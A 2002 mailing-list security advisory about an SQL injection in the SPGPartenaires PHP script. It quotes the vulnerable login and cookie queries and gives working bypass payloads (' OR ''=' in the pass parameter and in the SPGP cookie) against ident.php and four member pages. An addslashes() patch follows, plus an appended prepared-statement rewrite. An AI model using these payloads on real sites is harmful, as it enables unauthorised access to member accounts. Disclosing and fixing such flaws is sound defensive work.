Informations :
°°°°°°°°°°°°°°
Version : ? -> 3.0.1
Website : http://www.scripts-php-gratuits.com
Problem : SQL Injection -> Access to member's accounts

PHP Code/Location :
°°°°°°°°°°°°°°°°°°°
modif/ident.php :
--------------------------------------------------
[...]
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'";
$re=@mysql_db_query($db_name,$sql,$connect);
$result=@mysql_fetch_array($re);
if(empty($result[0]))
{
    header("location: index.php?msg=Identification+incorrecte+!");
}
else
{
    setcookie("SPGP",$id."||".$pass,time()+84600,"");
    header("location: index2.php");
}
[...]
--------------------------------------------------

modif/delete.php, modif/index2.php, modif/modif.php, modif/modif_suite.php :
--------------------------------------------------------------
<?
if(!isset($SPGP))
{
    header("location: index.php?msg=Veuillez+vous+identifier+!");
}
else
{
    $inf=explode("||",$SPGP);
    [...]
    $sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'";
    $re=@mysql_db_query($db_name,$sql,$connect);
    $result=@mysql_fetch_array($re);
    if(empty($result[0]))
    {
        header("location: index.php?msg=Veuillez+vous+identifier+!");
    }
    [...]
--------------------------------------------------------------

Exploits :
°°°°°°°°°°
http://[target]/modif/ident.php?id=[MEMBERID]&pass='%20OR%20''='

or

QUERY : ?SPGP=[ID]%7C%7C'%20OR%20''='
with :
- modif/delete.php
- modif/index2.php
- modif/modif.php
- modif/modif_suite.php

Patch :
°°°°°°°
In modif/ident.php replace the line :
----------------------------------------------------------------
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".$id."' AND motdepasse='".$pass."'";
----------------------------------------------------------------
by :
---------------------------------------------------------------
$sql="SELECT nomsite FROM SPGPartenaires WHERE id='".addslashes($id)."' AND motdepasse='".addslashes($pass)."'";
---------------------------------------------------------------

And in the other files replace the line :
---------------------------------------------------------------
$sql="SELECT id FROM SPGPartenaires WHERE id='".$inf[0]."' AND motdepasse='".$inf[1]."'";
---------------------------------------------------------------
by :
---------------------------------------------------------------
$sql="SELECT id FROM SPGPartenaires WHERE id='".addslashes($inf[0])."' AND motdepasse='".addslashes($inf[1])."'";
---------------------------------------------------------------

A patch can be found on http://www.phpsecure.org.

More details :
°°°°°°°°°°°°°°
In French : http://www.frog-man.org/tutos/SPGpartenaires.txt
Translated by Google : http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FSPGpartenaires.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools

frog-m@n
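The addslashes() patch above escapes the quote that the payload relies on, but the root cause is that user input is spliced into the SQL string at all. As an added example (not the author's patch and not SPGPartenaires code), here are the two checks from ident.php and the member pages rebuilt with PDO prepared statements, so that a value such as ' OR ''=' is compared as a literal password instead of changing the query. It assumes a PDO connection in $pdo and that ident.php receives id and pass as request parameters; the table and column names are the page's own. It keeps the page's "id||motdepasse" cookie scheme and fixes only the injection.

```php
<?php
// Added example (not the author's patch): same queries as the page, with the
// values bound as parameters instead of concatenated into the SQL string.
// Assumed: $pdo is a PDO connection to the database holding SPGPartenaires.

function findMemberSite(PDO $pdo, string $id, string $pass): ?string
{
    // ident.php: SELECT nomsite ... with id and motdepasse bound.
    $stmt = $pdo->prepare(
        'SELECT nomsite FROM SPGPartenaires WHERE id = :id AND motdepasse = :pass'
    );
    $stmt->execute([':id' => $id, ':pass' => $pass]);
    $site = $stmt->fetchColumn();
    // Mirror the page's empty($result[0]) check: no row or empty name = no login.
    return ($site === false || $site === '') ? null : (string) $site;
}

function memberFromCookie(PDO $pdo, ?string $spgp): ?string
{
    // delete.php / index2.php / modif.php / modif_suite.php: the cookie is
    // "id||motdepasse". Split on the first "||" only, then bind both halves.
    if ($spgp === null || strpos($spgp, '||') === false) {
        return null;
    }
    [$id, $pass] = explode('||', $spgp, 2);
    $stmt = $pdo->prepare(
        'SELECT id FROM SPGPartenaires WHERE id = :id AND motdepasse = :pass'
    );
    $stmt->execute([':id' => $id, ':pass' => $pass]);
    $row = $stmt->fetchColumn();
    return ($row === false || $row === '') ? null : (string) $row;
}

// ident.php usage: read the parameters explicitly (the page's code relied on
// register_globals for $id, $pass and $SPGP); GET is assumed, as in the advisory URL.
$site = findMemberSite($pdo, (string) ($_GET['id'] ?? ''), (string) ($_GET['pass'] ?? ''));
if ($site === null) {
    header('Location: index.php?msg=Identification+incorrecte+!');
    exit; // stop here; a redirect header alone does not end the script
}

// member page usage: the cookie is read from $_COOKIE, not a global.
if (memberFromCookie($pdo, $_COOKIE['SPGP'] ?? null) === null) {
    header('Location: index.php?msg=Veuillez+vous+identifier+!');
    exit;
}
```

The cookie still carries the password in clear, exactly as the original setcookie() call stores it; a session identifier issued after a successful findMemberSite() would remove that, but that is a separate change from the injection fix shown here.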
This archive was generated by hypermail 2b30 : Fri Dec 20 2002 - 19:54:28 PST